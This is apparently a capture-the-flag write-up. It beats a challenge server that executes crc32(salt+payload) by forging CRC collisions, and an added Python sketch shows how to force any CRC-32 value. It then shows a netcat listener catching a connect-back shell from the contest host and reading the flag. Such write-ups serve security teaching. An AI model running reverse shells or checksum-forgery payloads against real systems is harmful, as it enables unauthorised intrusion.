The task provides us with the source of the running server. The aim is to spawn a shell, but there is one problem: the data we send over the connection is crc32'd with a known salt (printed once we establish the connection) and THEN executed, so the payload we send isn't what the evaluator executes; it executes the result of crc32(salt+payload). To get an arbitrary value out of the crc32 result we used a collider generator (http://code.google.com/p/lxyppc-snake/source/browse/trunk/crccrash/crccrash.c). As shellcode we used a connect-back one that spawns a shell to our local machine. Code: http://pastebin.com/iMtgJpQQ
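
Why a CRC32 with a known salt does not constrain the output: CRC32 is linear, so four chosen bytes appended to any prefix steer the checksum to any 32-bit value. The sketch below is an added example, not the crccrash.c code or the pastebin script; the salt, body and target values are constructed, and the function names are hypothetical.

```python
import struct
import zlib

POLY = 0xEDB88320  # reflected CRC-32 polynomial, the one zlib.crc32 uses


def _make_table():
    table = []
    for i in range(256):
        reg = i
        for _ in range(8):
            reg = (reg >> 1) ^ POLY if reg & 1 else reg >> 1
        table.append(reg)
    return table


TABLE = _make_table()
# Every table entry has a distinct top byte, so one step can be undone.
TOP_BYTE_TO_INDEX = {entry >> 24: i for i, entry in enumerate(TABLE)}


def unstep_zero_byte(reg):
    """Return the register value that becomes `reg` after absorbing 0x00."""
    idx = TOP_BYTE_TO_INDEX[reg >> 24]
    return (((reg ^ TABLE[idx]) << 8) & 0xFFFFFFFF) | idx


def forcing_suffix(prefix, target):
    """Four bytes such that zlib.crc32(prefix + suffix) == target."""
    # zlib applies a final XOR with 0xFFFFFFFF; strip it to get raw state.
    state = target ^ 0xFFFFFFFF
    for _ in range(4):
        state = unstep_zero_byte(state)
    start = zlib.crc32(prefix) ^ 0xFFFFFFFF
    # Absorbing bytes X from state A equals absorbing zeros from A ^ X,
    # so X is the XOR of the two states, in little-endian byte order.
    return struct.pack("<I", start ^ state)


def demo():
    salt = b"constructed-salt"   # constructed stand-in for the printed salt
    body = b"arbitrary bytes"    # constructed filler
    target = 0xDEADBEEF          # constructed target value
    suffix = forcing_suffix(salt + body, target)
    return zlib.crc32(salt + body + suffix)


if __name__ == "__main__":
    print(hex(demo()))
```

A keyed MAC such as HMAC with a secret key does not have this property; a CRC with a disclosed salt is only an error-detection code.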

root@kaiman:~$ nc -lvp 7878
listening on [any] 7878 ...
connect to [1: not found from ec2-54-178-232-195.ap-northeast-1.compute.amazonaws.com [54.178.232.195] 40444
$ ls
bin
boot
dev
-- snip --
usr
var
vmlinuz
$ ls /home
sc
ubuntu
$ ls /home/sc
flag
sc.py
thisisnotbad
$ cat /home/sc/flag
a2fa361c9aabf6a541a1c6ac8b32fcb9

Razor4x